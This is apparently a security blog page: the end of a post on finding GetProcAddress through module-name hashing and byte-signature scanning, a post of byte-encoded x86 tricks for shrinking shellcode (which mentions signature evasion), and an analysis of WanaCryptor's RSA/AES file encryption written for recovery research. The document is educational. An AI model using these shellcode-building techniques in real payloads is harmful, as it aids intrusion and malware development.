// is this kernel32.dll or kernelbase.dll?
for (h=0, i=0; i<dte->BaseDllName.Length/2; i++) {
c = dte->BaseDllName.Buffer[i];
h += (c | 0x20);
h = ROTR32(h, 13);
}
if (h != 0xB1FC7F66 && h!= 0x22901A8D) continue;

}
}
}
```

For each executable section of this DLL

```LPVOID scan_img (LPVOID base)
{
BOOL                  is32;
PBYTE                 pRawData;
DWORD                 i, len;
LPVOID                gpa=NULL;

// for each section
for (i=0; i<len && gpa == NULL; i++) {
// is it executable?
if (sec[i].Characteristics & IMAGE_SCN_MEM_EXECUTE) {
pRawData = RVA2VA (PBYTE, base, sec[i].VirtualAddress);

gpa = scan_section (pRawData, sec[i].Misc.VirtualSize, is32);
}
}
return gpa;
}
```

Find the signature and scan backwards for the prolog bytes.

```LPVOID scan_section (PBYTE memory, DWORD len, BOOL is32)
{
DWORD  i, j, plen;
LPVOID ofs=NULL;

// 4-byte signature
BYTE   sig[] = { 0x38, 0x01, 0x00, 0xC0 };

// 3-byte prolog for 32-bit
BYTE   x32[] = { 0x55, 0x8B, 0xEC };

// 4-byte prolog for 64-bit
BYTE   x64[] = { 0x48, 0x89, 0x5C, 0x24 };
PBYTE  prolog, p;

p      = memory;
plen   = is32 ? sizeof(x32) : sizeof(x64);
prolog = is32 ? x32 : x64;

if (len <= sizeof(sig)) return NULL;

// subtract size of signature
// so we don't cause an exception
len -= sizeof(sig);

for (i=0; i<len; i++) {
// compare signature with current position
if ((memcmp(sig, &p[i], sizeof(sig))==0)) {
// try scanning backwards for prolog bytes
for (j=i; j>=0; j--) {
// found prolog bytes?
if (memcmp(prolog, &p[j], plen)==0) {
ofs = (LPVOID)&p[j];
break;
}
}
}
if (ofs != NULL) break;
}
return ofs;
}
```

### Summary

Does it work? For majority of 32-bit mode OS, it works fine because STATUS_ORDINAL_NOT_FOUND is within the prolog and epilog of GetProcAddress code. Where it doesn’t work is on Windows 7 64-bit because the constant is outside.

• Windows 7 32-bit
• (good!)

The 1st address is off by 2-bytes, but that’s the MOV EDI, EDI instruction used for hotpatching and can be safely skipped over.

• Windows 7 64-bit

• Windows 10 64-bit
• (good!)

Posted in assembly, programming, security, shellcode, windows | Tagged , , , , , | 3 Comments

## Shellcode: x86 optimizations part 1

### Introduction

What follows are a number of basic ways to compact shellcodes. In a follow up post, I’ll discuss a few ways to obfuscate them which might be useful for evading signature detection algorithms.

Some of the examples illustrated here can also be used for boot loaders, PE protectors/compressors, coding demos or something else that requires compact code.

The little tricks shown here are derived from various sources and I mention a number of people at the end of post in acknowledgements.

I did plan on discussing a little about the x86 architecture, but there’s already a lot of information out there and I assume you’re already familiar with it.

We’ll cover 4 things here:

1. Declaration and initialization of variables / registers
2. Testing value of register / variable
3. Conditional jumps / Control flow
4. Character conversions

### Initializing a register

Each CPU register is like a variable itself.

The x86 CPU in legacy mode has 8 General Purpose Registers (GPR) each capable of storing 32-bits or 4-bytes of information. Of course, we don’t normally use the Stack Pointer (ESP) for anything other than stack management, so we really only have 7 GPR to use. 4 of these provide access to 8 and 16-bit words.

A very common operation is to set a variable (or in this case register) to zero.
What you see below are a number of ways to do it. Some are better than others and really just depends on the situation.

```// 8-bits
"\x30\xc0"             /* xor al, al        */

"\x28\xc0"             /* sub al, al        */

"\xb0\x00"             /* mov al, 0x0       */

"\x24\x00"             /* and al, 0x0       */

// 16-bits
"\x66\x31\xc0"         /* xor ax, ax        */

"\x66\x29\xc0"         /* sub ax, ax        */

"\x66\xb8\x00\x00"     /* mov ax, 0x0       */

"\x66\x83\xe0\x00"     /* and ax, 0x0       */

"\x66\x6a\x00"         /* push 0x0          */
"\x66\x58"             /* pop ax            */

// 32-bits
"\xb8\x00\x00\x00\x00" /* mov   eax, 0      */

"\x31\xc0"             /* xor   eax, eax    */

"\x29\xc0"             /* sub   eax, eax    */

"\x6a\x00"             /* push  0           */
"\x58"                 /* pop   eax         */

"\x83\xe0\x00"         /* and   eax, 0      */

"\x6b\xc0\x00"         /* imul  eax, eax, 0 */

"\xf8"                 /* clc               */
"\x19\xc0"             /* sbb   eax, eax    */

"\x6a\xff"             /* push  -1          */
"\x58"                 /* pop   eax         */
"\x40"                 /* inc   eax         */

"\x31\xd2"             /* xor   edx, edx    */
"\x92"                 /* xchg  eax, edx    */

(when we know eax is < 0x80000000)
"\x99"                 /* cdq               */
"\x92"                 /* xchg  eax, edx    */

"\xb8\xff\xff\xff\xff" /* mov   eax, -1     */
"\x40"                 /* inc   eax         */

"\x83\xc8\xff"         /* or    eax, -1     */
"\x40"                 /* inc   eax         */

"\x6a\xff"             /* push  -1          */
"\x58"                 /* pop   eax         */
"\x40"                 /* inc   eax         */

(64-bit mode)
"\x48\x31\xc0"         /* xor rax, rax      */
```

It’s not a complete list of ways to initialize this particular register, but the operators used: MOV, XOR, SUB, AND can all set other variables to zero in a similar way.

One thing worth mentioning about the last instruction XOR RAX, RAX is that it’s not necessary to perform the operation on RAX. You can save a byte by using XOR EAX, EAX because the result is zero extended to 64-bits.

Initializing to -1

```"\xb8\xff\xff\xff\xff" /* mov eax, 0xffffffff */

"\x6a\xff"             /* push 0xffffffff     */
"\x58"                 /* pop eax             */

"\x83\xc8\xff"         /* or eax, 0xffffffff  */

"\xf9"                 /* stc                 */
"\x19\xc0"             /* sbb eax, eax        */

"\xb0\xff"             /* mov al, 0xff        */
"\x0f\xbe\xc0"         /* movsx eax, al       */

"\x31\xc0"             /* xor eax, eax        */
"\x48"                 /* dec eax             */

"\x31\xc0"             /* xor eax, eax        */
"\x83\xf0\xff"         /* xor eax, 0xffffffff */

"\x31\xc0"             /* xor eax, eax        */
"\xf7\xd0"             /* not eax             */
```

Moving a register into another.

```// moving register or immediate value into register
"\x83\xcb\xff"         /* or ebx, 0xffffffff  */
"\x21\xc3"             /* and ebx, eax        */

"\x31\xdb"             /* xor ebx, ebx        */
"\x09\xc3"             /* or ebx, eax         */

"\x31\xdb"             /* xor ebx, ebx        */
"\x01\xc3"             /* add ebx, eax        */

"\x31\xdb"             /* xor ebx, ebx        */
"\x31\xc3"             /* xor ebx, eax        */

"\x50"                 /* push eax            */
"\x5b"                 /* pop ebx             */
```

Initializing to immediate values is also very common, but something not always well executed by those writing a shellcode.

Let’s say you need 1 in EAX/RAX which under Linux would be the EXIT system call.

```//
"\x48\xc7\xc0\x01\x00\x00\x00"   /* mov rax, 0x1        */

"\x48\x31\xc0"                   /* xor rax, rax        */
"\x48\xff\xc0"                   /* inc rax             */

"\x31\xc0"                       /* xor eax, eax        */
"\xfe\xc0"                       /* inc al              */

"\x6a\x01"                       /* push 0x1            */
"\x58"                           /* pop rax             */

"\x83\xc8\xff"                   /* or eax, 0xffffffff  */
"\xf7\xd8"                       /* neg eax             */
```

There’s more than 1 reason to use the PUSH/POP combination. It’s more compact than any of the others, but also compatible with both 32 and 64-bit mode whereas some of the others are not.

In general, if the immediate value is between -128 and +127, use a PUSH/POP combination.

For values above this, the opcodes are larger.

Imagine an egg hunter shellcode where you want to attempt reading memory. This normally involves setting register to 4096 which represents a page table boundary.

I’ve often seen the following code used.

```// 32-bit
"\x31\xd2"             /* xor edx, edx    */
"\x66\x81\xca\xff\x0f" /* or dx, 0xfff    */
"\x42"                 /* inc edx         */

// 64-bit
"\x31\xd2"             /* xor edx, edx    */
"\x66\x81\xca\xff\x0f" /* or dx, 0xfff    */
"\x48\xff\xc2"         /* inc rdx         */
```

Here are some other ways, but with the last two being the most compact.

```//
"\x66\x68\x00\x10"     /* push 0x1000     */
"\x66\x5a"             /* pop dx          */
"\x0f\xb7\xd2"         /* movzx edx, dx   */

"\x68\x00\x10\x00\x00" /* push 0x1000     */
"\x5a"                 /* pop edx         */

"\xba\x00\x10\x00\x00" /* mov edx, 0x1000 */

"\x31\xd2"             /* xor edx, edx    */
"\xb6\x10"             /* mov dh, 0x10    */

"\x6a\x10"             /* push 0x10       */
"\x5a"                 /* pop edx         */
"\x86\xf2"             /* xchg dl, dh     */
```

When pushing -1 or 1 on stack, I’ve often seen code where a register is incremented or decremented.

Take this code in block_shell.asm

Pushing 1 on stack

```"\x46"                 /* inc esi             */
"\x56"                 /* push esi            */
"\x4e"                 /* dec esi             */
```

Which is perfectly fine, but you could just as well push 1 on stack and save a byte.

```"\x6a\x01"             /* push 0x1            */
```

The same operation is near end of code

```"\x4e"                 /* dec esi             */
"\x56"                 /* push esi            */
"\x46"                 /* inc esi             */
```

We can save a byte.

```"\x6a\xff"             /* push 0xffffffff     */
```

Okay, I’m not pointing out all the ways you can optimize metasploit code 🙂 ..just using real world examples where immediate values like this should be pushed on stack when it’s only 1 of those values you require.

In the 64-bit version, consider the following.

The number of bytes generated compared with 2 for an immediate push.

```"\x49\xff\xc0"         /* inc r8                  */
"\x41\x50"             /* push r8                 */
"\x49\xff\xc8"         /* dec r8                  */
```

### Allocating/Initializing Memory

Compilers will use ADD, SUB or in the past ENTER(Pascal/Ada) to allocate memory on the stack.

The unconventional way is to use PUSH/PUSHFD allocating 4 or more bytes. Even PUSHAD can allocate 32-bytes of storage in a single byte.

If using PUSHAD, you can adjust the stack later using ADD, SUB or LEA if you didn’t want to trash GPR with POPAD. Here are a few examples of allocating 32 bytes of space for something.

```//
"\xc8\x20\x00\x00"     /* enter 0x20, 0x0     */
"\xc9"                 /* leave               */

"\x55"                 /* push ebp            */
"\x89\xe5"             /* mov ebp, esp        */
"\x83\xec\x20"         /* sub esp, 0x20       */
"\xc9"                 /* leave               */

"\x83\xec\x20"         /* sub esp, 0x20       */
"\x83\xc4\x20"         /* add esp, 0x20       */

```

Here, we allocate 8 bytes and initialize to zero.

```// FPU

"\x83\xec\x08"         /* sub esp, 0x08       */
"\x89\xe7"             /* mov edi, esp        */
"\xd9\xee"             /* fldz                */
"\xdf\x3f"             /* fistp qword [edi]   */

// MOV

"\x83\xec\x08"         /* sub esp, 0x08       */
"\x89\xe7"             /* mov edi, esp        */
"\x31\xc0"             /* xor eax, eax        */
"\x89\x07"             /* mov [edi], eax      */
"\x89\x47\x04"         /* mov [edi+0x4], eax  */

// STOSD

"\x83\xec\x08"         /* sub esp, 0x08       */
"\x89\xe7"             /* mov edi, esp        */
"\x31\xc0"             /* xor eax, eax        */
"\x57"                 /* push edi            */
"\xab"                 /* stosd               */
"\xab"                 /* stosd               */
"\x5f"                 /* pop edi             */

// PUSH

"\x31\xc0"             /* xor eax, eax        */
"\x50"                 /* push eax            */
"\x50"                 /* push eax            */
"\x89\xe7"             /* mov edi, esp        */

// For 64-bit mode, we only need 1 push

"\x31\xc0"             /* xor eax, eax        */
"\x50"                 /* push rax            */
"\x54"                 /* push rsp            */
"\x5f"                 /* pop rdi             */
```

Here’s how I’d allocate 4096 byte buffer.

```// allocate 4096 bytes on stack and initialize to zero
"\x31\xc0"             /* xor eax, eax        */
"\x31\xc9"             /* xor ecx, ecx        */
"\xb5\x10"             /* mov ch, 0x10        */
"\x29\xcc"             /* sub esp, ecx        */
"\x89\xe7"             /* mov edi, esp        */
"\xf3\xaa"             /* rep stosb           */
```

The above code may cause an exception on Windows (unsure about UNIX-based systems) because of a stack limit imposed upon each application.

The default maximum stack size on Windows is 1MB, and on Linux it’s at least 4MB. Windows pre-allocates about 64KB of stack pages while Linux allocates 128KB.

When you allocate a large block of stack memory that exceeds what’s already available, you need to ensure the page is accessible. Compilers like MSVC and MINGW perform this under the hood so you don’t have to worry about it, but for assembly programming, you need to perform the stack probe yourself.

For example, the following code will allocate approx. 20KB of stack space in 4096-byte blocks.

```; allocate 20KB using stack probe
"\x31\xc9"             /* xor ecx, ecx        */
"\xf7\xe1"             /* mul ecx             */
"\xb1\x05"             /* mov cl, 0x5         */
"\xb6\x10"             /* mov dh, 0x10        */

"\x29\xd4"             /* sub esp, edx        */
"\x85\x24\x24"         /* test [esp], esp     */
"\xe2\xf9"             /* loop 0x8            */
```

The instruction ‘test [esp], esp‘ should trigger a kernel exception forcing expansion of stack accessible to the application. If the memory is unavailable, the program will raise an exception.

### Testing registers

Many functions tend to return 1 for success (TRUE) or 0 for failure (FALSE).
Some will also return -1 or less than zero to indicate failure.

The best way to test for these values is by performing some operation on register that affects the status flags.

The main ones you’ll see used here are Zero Flag (ZF), Sign Flag (SF), Parity Flag (PF) and sometimes the Carry Flag (CF).

You can of course use the Overflow Flag (OF) too, but I don’t use it in examples here.

The Adjust Flag (AF) (also known as the Auxiliary Flag) can be used, but unfortunately doesn’t have a jump opcode associated with it.

You must load the flags into a register for testing using a PUSHFD/POP combination or using the one-byte instruction LAHF.

Testing for 0 or FALSE.

```//
"\x83\xf8\x00"         /* cmp eax, 0x0  */
"\x74\x12"             /* jz 0x18       */

"\x85\xc0"             /* test eax, eax */
"\x74\x0e"             /* jz 0x18       */

"\x09\xc0"             /* or eax, eax   */
"\x74\x0a"             /* jz 0x18       */

"\x21\xc0"             /* and eax, eax  */
"\x74\x06"             /* jz 0x18       */

"\x48"                 /* dec eax       */
"\x78\x03"             /* js 0x18       */

"\x91"                 /* xchg ecx, eax */
"\xe3\x00"             /* jecxz 0x18    */
```

Testing for 1 or TRUE.

```//
"\x3c\x01"             /* cmp al, 0x1   */
"\x75\x15"             /* jnz 0x24      */

"\x66\x83\xf8\x01"     /* cmp ax, 0x1   */
"\x75\x1e"             /* jnz 0x2a      */

"\x83\xf8\x01"         /* cmp eax, 0x1  */
"\x75\x19"             /* jnz 0x24      */

"\x0f\xba\xe0\x00"     /* bt eax, 0x0   */
"\x73\x0f"             /* jae 0x24      */

"\x85\xc0"             /* test eax, eax */
"\x7a\x0b"             /* jnp 0x24      */

"\x09\xc0"             /* or eax, eax   */
"\x7a\x07"             /* jnp 0x24      */

"\x21\xc0"             /* and eax, eax  */
"\x7a\x03"             /* jnp 0x24      */

"\x48"                 /* dec eax       */
"\x75\x00"             /* jnz 0x24      */

"\xf7\xd8"             /* neg eax       */
"\x78\x75"             /* js 0x7a       */
```

Testing for -1

I’ve often seen code that tests for -1 directly as shown in the first example, but it’s more efficient and compact to use the Sign Flag (SF) in 2nd example.

If operating in legacy mode, we can save a byte by incremeting the register and testing Zero Flag (ZF) instead.

Because ZF=1, PF=1 and SF=0 after the increment, you could alternatively use JP or JNS instead of JZ as shown in 3rd example.

If decrementing by 1 shown in the last example. SF=1, ZF=0, PF=0 so we can use JS, JNP, JNZ or JL.

```//
"\x83\xf8\xff"         /* cmp eax, 0xffffffff */
"\x74\x2e"             /* jz 0x33             */

"\x85\xc0"             /* test eax, eax       */
"\x78\x2e"             /* js 0x32             */

"\x40"                 /* inc eax            */
"\x74\x16"             /* jz 0x1d            */

"\x48"                 /* dec eax             */
"\x78\x19"             /* js 0x22             */
```

The problem with last two for 64-bit mode is that there are no 1-byte instructions for INC/DEC as these are reserved for REX prefixes.

In that case, it’s better to use TEST or increment of an 8-bit register (if available) like AL for EAX/RAX. You could also just check AL for itself or -1 which is smaller too.

JLE can be used after a call to a BSD socket function like recv or send since it can return 0 or -1 on error.

```// jump if <= 0
"\x85\xc0"             /* test eax, eax       */
"\x7e\x19"             /* jle 0x23            */
```

Testing for 0x80, 0x8000, 0x80000000

Performed usually to indicate overflow after doubling/multiplication by 2.

The flags set after a TEST instruction: PF=1, SF=1, ZF=0

Imagine a value to test is 0x80000000.

```// jump if 0x80000000
"\x85\xc0"             /* test eax, eax       */
"\x78\x19"             /* js 0x23             */
```

We could also use INC EAX which sets SF=1, PF=0, OF=0 which allows us to use JS, JNP, JNO or JL

```// jump if 0x80000000
"\x40"                 /* inc eax             */
"\x78\x19"             /* js 0x22             */
```

What if we use DEC EAX instead? This sets SF=0, PF=1, OF=1 which allows us to use JNS, JP, JO, or JG

```// jump if 0x80000000
"\x48"                 /* dec eax             */
"\x79\x19"             /* jns 0x22            */
```

By adding 0x80000000, the result is zero setting ZF=1, OF=1, CF=1. Use JZ, JO or JC/JB
Subtraction will set ZF=1, OF=0, CF=0. Use JZ, JNO or JNC/JNB.

```// jump if 0x80000000
"\x01\xc0"             /* add eax, eax        */
"\x74\x19"             /* jz 0x23             */
```

```// jump if 0x80000000
"\xd1\xe0"             /* shl eax, 1          */
"\x74\x19"             /* jz 0x23             */
```

Using edx

```// jump if 0x80000000
"\x99"                 /* cdq                 */
"\x42"                 /* inc edx             */
"\x74\x0f"             /* jz 0x13             */
```

Sign extend using Shift Arithmetic Right (SAR)

```; CF=1, ZF=1, SF=0 for <  0x80000000
; CF=0, ZF=0, SF=1 for >= 0x80000000

"\xc1\xf8\x1f"         /* sar eax, 0x1f       */
"\x78\x5b"             /* js 0x60             */
```

Using the negate instruction which doesn’t alter the register.

```; CF=1, ZF=0, SF=1, OF=1, PF=1 if eax == 0x80000000
"\xf7\xd8"             /* neg eax             */
"\x72\x38"             /* jb 0x3c             */
"\x78\x36"             /* js 0x3c             */
"\x75\x34"             /* jnz 0x3c            */
"\x70\x32"             /* jo 0x3c             */
"\x7a\x30"             /* jp 0x3c             */
```

### Conditional jumps / Control flow

This involves performing what you might do in higher level languages using FOR, WHILE and DO/WHILE statements.

The NOP instructions are only filler material, taking the place of something otherwise useful.

Normally, I’d try use ECX if it’s free along with a LOOP instruction, but it really depends on the situation.

Looping 2 times

```// Parity Flag

"\x31\xc0"             /* xor eax, eax  */
"\x90"                 /* nop           */
"\x90"                 /* nop           */
"\x48"                 /* dec eax       */
"\x7a\xfb"             /* jp 0x3        */

// Sign Flag

"\x31\xc0"             /* xor eax, eax  */
"\x90"                 /* nop           */
"\x90"                 /* nop           */
"\x04\x40"             /* add al, 0x40  */
"\x79\xfa"             /* jns 0x3       */

// Zero Flag

"\x31\xc0"             /* xor eax, eax  */
"\x90"                 /* nop           */
"\x90"                 /* nop           */
"\x04\x80"             /* add al, 0x80  */
"\x75\xfa"             /* jnz 0x3       */
```

Another way to loop twice if all your registers are used up is using the carry flag.
We clear it first (if not already) save the flags on stack, execute our code, restore flags, complement and loop again.

```// using the carry flag
"\xf8"                 /* clc                 */
"\x9c"                 /* pushfd              */
"\x90"                 /* nop                 */
"\x90"                 /* nop                 */
"\x9d"                 /* popfd               */
"\xf5"                 /* cmc                 */
"\x72\xf9"             /* jb 0x2              */
```

Looping 3 times

For PF, set a register to zero and increment by 1 until PF=1.
For SF, set a register to zero and increment by a number between 43 and 63 until SF=1.
For ZF, set a register to one and increment by 85 until ZF=1

```// Parity Flag

"\x31\xc0"             /* xor eax, eax  */
"\x90"                 /* nop           */
"\x90"                 /* nop           */
"\x40"                 /* inc eax       */
"\x7b\xfb"             /* jnp 0x3       */

// Sign Flag

"\x31\xc0"             /* xor eax, eax  */
"\x90"                 /* nop           */
"\x90"                 /* nop           */
"\x04\x30"             /* add al, 0x30  */
"\x79\xfa"             /* jns 0x3       */

// Zero Flag

"\x6a\x01"             /* push 0x1      */
"\x58"                 /* pop eax       */
"\x90"                 /* nop           */
"\x90"                 /* nop           */
"\x04\x55"             /* add al, 0x55  */
"\x75\xfa"             /* jnz 0x4       */
```

You may also point out that we can simply set EAX to 3 and decrease until zero, which is true.

```// Zero Flag
"\x6a\x03"             /* push 0x3            */
"\x58"                 /* pop eax             */
"\x90"                 /* nop                 */
"\x90"                 /* nop                 */
"\x48"                 /* dec eax             */
"\x75\xfb"             /* jnz 0x4             */
```

And if ECX is free, we can simply use LOOP

```// ECX
"\x6a\x03"             /* push 0x3            */
"\x59"                 /* pop ecx             */
"\x90"                 /* nop                 */
"\x90"                 /* nop                 */
"\xe2\xfc"             /* loop 0x4            */
```

Whenever ECX is free, use LOOP.

If we can’t use ECX, set AL to -1 and use subtraction which saves us a byte compared with 2nd example. You could also set AL to 1 if you wanted to use addition instead.

```// Zero Flag
"\x0c\xff"             /* or al, 0xff         */
"\x90"                 /* nop                 */
"\x90"                 /* nop                 */
"\x2c\x55"             /* sub al, 0x55        */
"\x75\xfa"             /* jnz 0x3             */
```

Looping 4 times

This is a little easier since 256 is divisible evenly by 4 for ZF, 128 for SF.

```// Sign

"\x31\xc0"             /* xor eax, eax        */
"\x90"                 /* nop                 */
"\x90"                 /* nop                 */
"\x04\x20"             /* add al, 0x20        */
"\x79\xfa"             /* jns 0x3             */

// Zero

"\x31\xc0"             /* xor eax, eax        */
"\x90"                 /* nop                 */
"\x90"                 /* nop                 */
"\x04\x40"             /* add al, 0x40        */
"\x75\xfa"             /* jnz 0x3             */
```

You could go on and on with this, but you should grasp from the above examples how to write your own.

The last part of control flow involves implementing conditional calls using relative offsets. Imagine a situation where based on the result of a call to another function, you want to invoke a fake function to confuse some analysis of the code. This is very basic of course.

This only tests for TRUE or FALSE condition, but it would be trivial to test for -1 or a signed value < 0

### Character conversions

There are times you might want to convert a string from lowercase to uppercase and vice versa. There are also times you’ll want conversion from unicode to ansi, although the code shown here for that will only cover latin alphabets.

Upper/Lowercase

Converting case is simply a matter of toggling a bit on and off. Look at the following characters and their binary values.

a = 01100001 A = 01000001
b = 01100010 B = 01000010
c = 01100011 C = 01000011

For lowercase, bit 5 is set. (i’m counting from 0).
If you’re positive the string is only lowercase or only uppercase, then using an XOR will flip the case.

```// flip the case
"\x34\x20"             /* xor al, 0x20             */
```

If you want all lowercase without having to compare each byte, just use OR

```// convert to lowercase
"\x0c\x20"             /* or al, 0x20              */
```

For uppercase, use AND with 0xDF to zero out bit 5. The only problem is that it will screw up digits or other characters that don’t have a lowercase equivilent.

```// convert to uppercase
"\x24\xdf"             /* and al, 0xdf             */
```

Of course, you can also use BTS to set it to lowercase, but it requires more bytes.

```// set to lowercase
"\x0f\xba\xe8\x05"     /* bts eax, 0x5             */
```

Or if you’re just flipping the case, BTR

```// flip case
"\x0f\xba\xf0\x05"     /* btr eax, 0x5             */
```

What happens if you have digits in the string or some other special characters? I’ve used lowercase conversions for shellcode instead of uppercase, because the latter requires conditional jumps and it’s not really required.

Take for example the metasploit code block_api.asm

Converting the string to lowercase, you could use the following. Bear in mind, this is reading information about DLL from InLoadOrderLinks which is different to what Metasploit reads.

```;
movzx  ecx, word[edi+44]  ; len = BaseDllName.Length
mov    esi, [edi+48]      ; str = BaseDllName.Buffer
shr    ecx, 1             ; len /= 2
xor    eax, eax           ; c = 0
cdq                       ; h = 0
hash_dll:                     ; do {
lodsw                     ;   c = *str++
or     al, 0x20           ;   c = tolower(c)
ror    edx, 13            ;   h = ROTR32(h, 13)
add    edx, eax           ;   h += c
loop   hash_dll           ; while (--len)
```

You couldn’t just plug this into the existing metasploit code of course because the hashes generated would be completely different. It’s just to demonstrate another approach.

If you set bit 5 using OR for digits 0-9, nothing changes since bit 5 is already set for those values.

The same is true for periods which separate module name from extension, like KERNEL32.DLL will simply be converted to kernel32.dll using OR without the need for conditional jumps.

But if converting to uppercase using SUB instruction, you need conditional jumps.

Ansi and Unicode

okay, this is not strictly unicode conversion since we’re only using latin alphabets.
Unicode strings end with 2 null bytes so this should terminate once null byte reached.

```; esi = unicode in
; edi = ansi out
uni2ans:
movsb             ; convert it to asciiz format
dec   edi
cmpsb
jnz   uni2ans
```

### Acknowledgements

There’s a lot of people who helped write this post indirectly through sharing their knowledge and ideas. Some who have inspired code shown here include:

drizz, r!sc, d0ris, jb, Z0MBiE, WiteG, Vecna, Mental Driller, GriYo, JPanic, Qkumba/Peter Ferrie, Jacky Qwerty, Super, hh86, benny and any others I forgot.

## WanaCryptor File Encryption and Decryption

### Introduction

This is a quick post about the WanaCryptor ransomware wreaking havoc on many networks across the world this weekend. With all the news coverage, most of you already know the trouble caused by it.

Once executed on a system, it will use the RSA and AES cryptographic algorithms to encrypt files before demanding payment in exchange for a key necessary to recover those files. If you want to understand the RSA cryptosystem, please read here since all the talk about public and private keys might be confusing to some readers at first.

### WanaFork

The source code provided along with this post is intended primarily for security researchers who wish to understand the encryption and decryption process, which may help with recovery of files in the event authors of ransomware decide to release their private key.

There’s no discussion here on any behavior of the ransomware except the encryption/decryption process so if you want information about something else, have a look at this file here which was compiled by various security researchers in the #wannadecryptor channel on Freenode IRC servers.

For the source code to wanafork, see sources in C here. It’s only been compiled with MSVC and tested on Windows, although MINGW should compile it ok, provided it’s a recent version.

### Encryption Process

Each system generates an RSA key pair of 2048-bits using the CryptGenKey API which is part of the Microsoft Crypto API (CAPI).

The public key is stored in 00000000.pky using CryptExportKey
The private key is stored in 00000000.eky using CryptExportKey but is also encrypted before storage using CryptEncrypt API with the master public key embedded inside the DLL responsible for encrypting files on disk.

This encryption of private key is what prevents recovery of files without assistance from the ransomware authors.

For each file encrypted, CryptGenRandom API is used to derive a 16-byte value which is used with AES-128 in CBC mode to encrypt the data.

The AES key is encrypted with the users public key and stored along with AES ciphertext.

The only way to recover this AES key and thus the contents of encrypted files is through decryption using the private key and we need the master private key to do this.

### Ransom payment process

Although I haven’t researched this at all, it seems reasonable to make some assumptions based on the encryption model that some component of the ransomware sends the encrypted private key stored in 00000000.eky to a server over the TOR network where it’s decrypted by the ransomware authors using their master private key.

The decrypted private key is then sent back to the victim’s system and stored as 00000000.dky which allows @WanaDecryptor@.exe to recover files.

Open to correction of course. It has been pointed out by some that there’s no way for the ransomware authors to identify who makes a payment.

Because of the algorithm used, it isn’t feasible to recover data from encrypted files without assistance from the ransomware authors.

The rest of post may only be of interest to developers / researchers.

### Definitions

You’ll see these values throughout the source code shown here.

### WanaCryptor Archive Structure

Each encrypted file or what I call archive, has a predefined structure necessary for successful decryption.

• Signature
• 64-bit signature. Currently set to the string “WANACRY!

• Key Length
• Indicates length in bytes of the following encrypted AES key.

• Encrypted AES key
• 128-bit AES key encrypted using the users RSA public key stored in 00000000.pky
This key is generated by CryptGenRandom.

• Unknown 32-bit value
• I’m unsure what this is for yet. It’s usually set to 3 or 4

• File Length
• 64-bit value obtained from GetFileSizeEx which indicates the original size of file.

• Ciphertext
• Encrypted data using AES-128 in CBC mode. Uses zero padding.

The following is a structured hex dump of encrypted file generated by the malware.

### RSA Key Generation

As said, the RSA keys generated are unique to each system.

In the tool, both public + private keys are exported in their plaintext form. The private key is also encrypted for illustrating how the malware does it.

### AES Key Generation

The AES keys for each file are generated using CryptGenRandom API which is cryptographically secure and therefore invulnerable to attack.

When decrypting an archive, we need to decrypt the encrypted AES key using the RSA private key blob stored in 00000000.dky

In both scenarios, because I’m using Crypto API for AES, additional steps are required to import the key into a CAPI key object.

I’d guess using a custom AES was probably easier to use than Crypto API, but that’s just speculation on my part.

### Encryption

WanaCryptor uses Zero Padding, but Crypto API doesn’t support it.

Rather than set the bFinalize flag to TRUE when encrypting final block, the buffer should be aligned by 16 bytes and padded with null bytes. The bFinalize flag should remain FALSE in order to be compatible with WanaCryptor.

Here’s an example of creating a WanaCryptor archive and using Crypto API to perform AES-128-CBC encryption of file data.

### Decryption

As with Encryption, the bFinalize flag (if using Crypto API) should always be FALSE. This is because Microsoft Crypto CSPS don’t support zero padding.

### Summary

Without the master private key generated by the authors, it’s not possible to recover data from encrypted files unless by miracle someone discovers a flaw with either AES or RSA.

Thanks to 0x4d_ for helping with post and all the folks on freenode for researching this malware over the weekend.

This tool will require a lot more testing before it can be considered reliable and the only reason for releasing it early is so that others can study the source and write their own decryption tools.